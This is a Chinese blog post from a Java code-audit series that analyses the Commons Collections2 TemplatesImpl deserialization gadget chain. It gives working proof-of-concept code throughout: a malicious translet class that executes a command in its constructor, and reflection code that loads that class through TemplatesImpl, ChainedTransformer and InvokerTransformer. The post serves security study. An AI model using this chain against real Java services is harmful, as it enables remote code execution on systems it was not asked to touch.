Java代码审计——Commons Collections2 TemplatesImpl底层调用链

最新推荐文章于 2024-06-29 18:26:20 发布
最新推荐文章于 2024-06-29 18:26:20 发布
阅读量1.1k 收藏
点赞数
分类专栏: Java代码审计 文章标签: Java代码审计
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/121541929
版权

0x00 前言

反序列化总纲

分析完了CC1和TransformedMap链,接着来看CC2这个链,看了一些文章,但是仅仅是看的话,无法真切的理解其中的含义,所以需要进行自己分析,并且记录其中关键点。这一篇主要是把底层调用遇到的问题讲清楚。

0x01 底层调用链

底层调用链分为两层,一层是Java类字节化,一层是通过TemplatesImpl进行调用。

1.Java类字节化

这里Java字节化选择的是Javassist。
简单的说一下Javassist,Javassist主要是用来做动态生成Java类的库,可以从输入的内容动态的创建库在某些场景中是非常好用的功能。
那么为什么要生成Java类的字节码呢,当然是因为TemplatesImpl中需要一个参数是字节码才可以进行调用。

poc

ClassPool classPool = ClassPool.getDefault();
CtClass ctClass = classPool.getCtClass("com.Controller.TestTemplatesImpl"); 
byte[] bytes = ctClass.toBytecode();

TestTemplatesImpl

package com.Controller;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class TestTemplatesImpl extends AbstractTranslet {

    public TestTemplatesImpl() {
        super();
        try {
            Runtime.getRuntime().exec("calc");
        }catch (Exception e){
            e.printStackTrace();
        }
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

2.TemplatesImpl

这里选择使用TemplatesImpl进行触发,那么肯定是有原因的。
在TemplatesImpl中找到defineTransletClasses方法中,有一个defineClass的地方, 将_bytecodes进行反序列化。defineClass是专门用来加载字节码的。

在这里插入图片描述

2.1 defineTransletClasses调用(失败调用)

首先来验证一下,原本的意思是通过暴力反射的方式去调用的,但是调用之后发现没有办法调起。但是还是将整个过程记录下来。
首先来看defineTransletClasses需要的条件。
首先肯定是要先拿到TemplatesImpl。利用反射获取

Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});
Object TemplatesImpl_instance = constructor.newInstance();

然后再来看defineTransletClasses肯定是需要_bytecodes的值。

Field bytecodes = aClass.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
bytecodes.set(TemplatesImpl_instance , new byte[][]{bytes});

最后调用defineTransletClasses

Method method2 = TemplatesImpl_instance.getClass().getDeclaredMethod("defineTransletClasses");method2.setAccessible(true);method2.invoke(TemplatesImpl_instance);

然后报错了—

Exception in thread "main" java.lang.reflect.InvocationTargetException
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at com.Controller.CommonCollections1.main(CommonCollections1.java:150)
Caused by: java.lang.NullPointerException

这个错误解决了很久,最后只能通过调试对比的方式来看看问题出现在哪。
最后经过调试,发现在这个位置会报错退出

在这里插入图片描述
对比一下,可以发现,少了一个值

在这里插入图片描述

那么就还是暴力加进去。

Field tfactory = aClass.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(TemplatesImpl_instance , new TransformerFactoryImpl());

这里成功运行了,但是没有执行= =

在这里插入图片描述
调试之后发现问题了,原来是因为defineTransletClasses只负责做Class.forName的工作,不进行其他工作,所以直接调用不行= =

2.2 getTransletInstance 成功调用

接着可以去找一下defineTransletClasses的调用,找到了getTransletInstance方法,在defineTransletClasses中,类是存储在_class中的,然后接着调用newInstance,就是触发了构造方法。那么我们现在来构造调用getTransletInstance。
还是来看条件,在getTransletInstance中多了一个如果_name为空则退出的条件,那我们还是暴力添加。

Field name = aClass.getDeclaredField("_name");
name.setAccessible(true);
name.set(TemplatesImpl_instance , "cs");

最终poc如下:

ClassPool classPool = ClassPool.getDefault();
CtClass ctClass = classPool.getCtClass("com.Controller.TestTemplatesImpl");
byte[] bytes = ctClass.toBytecode();

Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});
Object TemplatesImpl_instance = constructor.newInstance();

Field bytecodes = aClass.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
bytecodes.set(TemplatesImpl_instance , new byte[][]{bytes});

Field tfactory = aClass.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(TemplatesImpl_instance , new TransformerFactoryImpl());

Field name = aClass.getDeclaredField("_name");
name.setAccessible(true);
name.set(TemplatesImpl_instance , "cs");

Method method2 = TemplatesImpl_instance.getClass().getDeclaredMethod("getTransletInstance");
method2.setAccessible(true);
method2.invoke(TemplatesImpl_instance);

测试结果:

在这里插入图片描述

2.3 newTransformer

在getTransletInstance中,我们是通过暴力反射的方式去调用的,但是在实际情况中,无法进行直接调用,我们需要一个public的可调用的方法,最终在newTransformer中找到了调用getTransletInstance的位置。
在这里插入图片描述

所以我们这里可以将调用改为newTransformer。
poc

ClassPool classPool = ClassPool.getDefault();
CtClass ctClass = classPool.getCtClass("com.Controller.TestTemplatesImpl");
byte[] bytes = ctClass.toBytecode();

Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});
Object TemplatesImpl_instance = constructor.newInstance();

Field bytecodes = aClass.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
bytecodes.set(TemplatesImpl_instance , new byte[][]{bytes});

Field tfactory = aClass.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(TemplatesImpl_instance , new TransformerFactoryImpl());

Field name = aClass.getDeclaredField("_name");
name.setAccessible(true);
name.set(TemplatesImpl_instance , "cs");

Method method2 = TemplatesImpl_instance.getClass().getDeclaredMethod("newTransformer");
method2.setAccessible(true);
method2.invoke(TemplatesImpl_instance);

运行效果:
在这里插入图片描述

3.迭代链

那么既然已经构造了类,那么我们依旧可以使用迭代链的方式进行利用,作用是可以绕过一些调用防护。
迭代链构造

public  static void demo10() throws NotFoundException, IOException, CannotCompileException, ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, NoSuchFieldException {
    ClassPool classPool = ClassPool.getDefault();
    CtClass ctClass = classPool.getCtClass("com.Controller.TestTemplatesImpl");
    byte[] bytes = ctClass.toBytecode();

    Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
    Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});
    Object TemplatesImpl_instance = constructor.newInstance();

    Field bytecodes = aClass.getDeclaredField("_bytecodes");
    bytecodes.setAccessible(true);
    bytecodes.set(TemplatesImpl_instance , new byte[][]{bytes});

    Field tfactory = aClass.getDeclaredField("_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(TemplatesImpl_instance , new TransformerFactoryImpl());

    Field name = aClass.getDeclaredField("_name");
    name.setAccessible(true);
    name.set(TemplatesImpl_instance , "cs");

    Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(TemplatesImpl_instance),
            new InvokerTransformer("newTransformer",null,null)
    };

    Transformer transformerChain = new ChainedTransformer(transformers);
    transformerChain.transform(Object.class);
}

4.顺序调用

还有一种就是不走迭代链,直接使用InvokerTransformer 进行调用也是可以的。
poc:

ClassPool classPool = ClassPool.getDefault();
CtClass ctClass = classPool.getCtClass("com.Controller.TestTemplatesImpl");
byte[] bytes = ctClass.toBytecode();

//反射创建TemplatesImpl
Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});
Object TemplatesImpl_instance = constructor.newInstance();

//将恶意类的字节码设置给_bytecodes属性
Field bytecodes = aClass.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
bytecodes.set(TemplatesImpl_instance , new byte[][]{bytes});
//设置属性_name为恶意类名
Field name = aClass.getDeclaredField("_name");
name.setAccessible(true);
name.set(TemplatesImpl_instance , "TestTemplatesImpl");

Field tfactory = aClass.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(TemplatesImpl_instance , new TransformerFactoryImpl());
TemplatesImpl_instance.getClass();
InvokerTransformer transformer=new InvokerTransformer("newTransformer",null,null);
transformer.transform(TemplatesImpl_instance);

0x03 使用条件

  • 除最新版本无限制

0x04 要点笔记

  • javassist 生成字节码
  • Templateslmpl中需要有三个参数才可以调用,java字节码,name,tfactory
  • 调用点newTransformer-getTransletInstance-defineTransletClasses
王嘟嘟_
关注
专栏目录
fastjson1.2.24TemplatesImpl利用源码分析
weixin_45682070的博客
12-28 734
构造恶意类 package org.example.fastjson.TemplatesImpl; import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.Feature; import com.alibaba.fastjson.parser.ParserConfig; public class Test { public static void main(String[] args) { Parse
commons-collections4-4.1
11-01
在这个"commons-collections4-4.1"版本中,主要关注的是修复一个重要的安全问题——Java反序列化漏洞。 Java反序列化漏洞通常发生在处理从网络接收或从持久存储中读取的序列化对象时。当恶意构造的序列化数据被反...
Java代码审计——Fastjson TemplatesImpl调用
王嘟嘟的博客
12-09 2654
0x00 前言 反序列化总纲 除开jdbc调用,还有一个TemplatesImpl调用,这个在CC中是出现过的。可以参考:调用 主要的要点在满以下三个变量 _bytecodes _name _tfactory 还有就是调用newTransformer的方法 0x01 调用 先上poc: final String CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; ParserConfig conf
CC1-Transformer利用分析
最新发布
06-29 767
JDK 8u65环境配置参考。
[Java反序列化]Java-CommonsCollections2TemplatesImpl利用分析
Y4tacker的博客
07-28 504
文章目录Java-CommonsCollections2TemplatesImpl利用分析完整代码 Java-CommonsCollections2TemplatesImpl利用分析 我们知道我们之前可以利用TemplatesImpl 构造出⽆Transformer数组的利⽤,那这里是否可以实现呢,答案是是的,在这里的queue 现在开始正文,还是稍微详细说一下利用过程吧 现在我们的目标就是通过PriorityQueue来调用TemplatesImpl的newTransformer来加载字节码 T
templateslmpl利用
qq_62046696的博客
03-13 459
cc3Jdk版本:调用AnnoctionInvocationHandler中的版本需要在,
[Java安全]利用TemplatesImpl执行字节码
Y4tacker的博客
07-25 3051
文章目录defineClass利用TemplatesImpl执行字节码 defineClass 介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码 public class TouchFile{ public TouchFile() throws Exception { Runtime.getRuntime().exec("calc"); } } 把它编译成字节码后Base64 之后运行 Method defineClass =
commons-collections-3.2.2-API文档-中文版.zip
05-01
标签:collectionscommons、jar包、java、中文文档; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心...
commons-collections4-4.1-API文档-中文版.zip
07-03
标签:apache、commonscollections4、中文文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准...
commons-collections4-4.4-API文档-中英对照版.zip
05-04
标签:apache、collections4、commons、jar包、java、中英对照文档; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明...
java写日志的jar包——commons-logging-1.0.4.jar
09-13
commons-logging-1.0.4.jar可以引入: org.apache.commons.logging.Log,org.apache.commons.logging.LogFactory等,用于写日志。 免费送,只要1积分
基于 javaagent + javassist 一步步实现调用系统 (2)
weixin_44231940的博客
08-03 1077
上一章中, 我们基本上将 JDBC, Servlet 的信息采集以及调用的实现思路给梳理清楚了. 现在我们就可以开始编写我们的调用系统了. 首先, 我们使用 javaagent 来对字节码进行一个插桩, 然后将采集的信息上传到 ElasticSearch 中, 使用的 jdk版本是祖传的1.8 ...
Java反序列化5-Fastjson 1.2.22-1.2.24 TemplatesImpl利用分析
weixin_43263451的博客
07-12 1062
Fastjson是alibaba开源的一个json库,能够对json字符串进行序列化与反序列化操作。其在1.2.22-1.2.24版本被爆出来存在反序列化漏洞。该反序列化漏洞一共有两条子这次主要分析的是TemplateImpl利用。这条子还是利用了TemplateImpl类,将avasisit生成的恶意类赋值给_bytecodes属性,当反序列化TemplateImpl对象时会调用其gettter和setter方法,在调用这些方法的时候调用了newTransformer从而进入TemplateImpl
13-java安全——fastjson1.2.24反序列化TemplatesImpl利用分析
网络安全
08-27 2862
漏洞环境: fastjson1.2.24 jdk1.7.80 新建一个maven项目在pom.xml文件中引入fastjson的依赖: <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</v
Java代码审计——Commons Collections2 PriorityQueue
王嘟嘟的博客
11-30 942
0x00 前言 反序列化总纲 PriorityQueue是支持在1.8版本使用的调用,还是来跟一下整个的流程。 0x01 PriorityQueue PriorityQueue实际上是的主要作用是用来排序的,所以很多函数方法都需要大于Queue大于二来进行触发。 PriorityQueue是调用的最后一个部分,实际上触发的位置在readObject的位置。 首先来看readObject,调用了heapify 接着看heapify,在这个方法中调用了siftDown方法 接着来看siftDown, 如
java代码审计之CC1(一)
st3pby的博客
02-20 3845
InvokerTransformerCC1的漏洞点位于InvokerTransformer.class中反射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
Java代码审计&原生反序列化&CC跟踪分析
qq_46081990的博客
01-24 1652
观察到decorate方法调用过该构造方法TransformedMap,由此想到可以利用decorate方法间接控制valueTransformer,即控制decorate方法的传参valueTransformer=new InvokerTransformer(),那么执行decorate方法就会触发构造方法设置valueTransformer为InvokerTransformer类对象。总结:无非就是让前面调用方法的类发生更改,控制其等于后面的类,让其调用后面类的方法。
java审计CC1-7学习
superprintf的博客
01-06 873
[基础知识] CC(apache common collections组件漏洞利用) ysoserial java动态代理 Javassist动态编程 [分析] freebuf文章
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值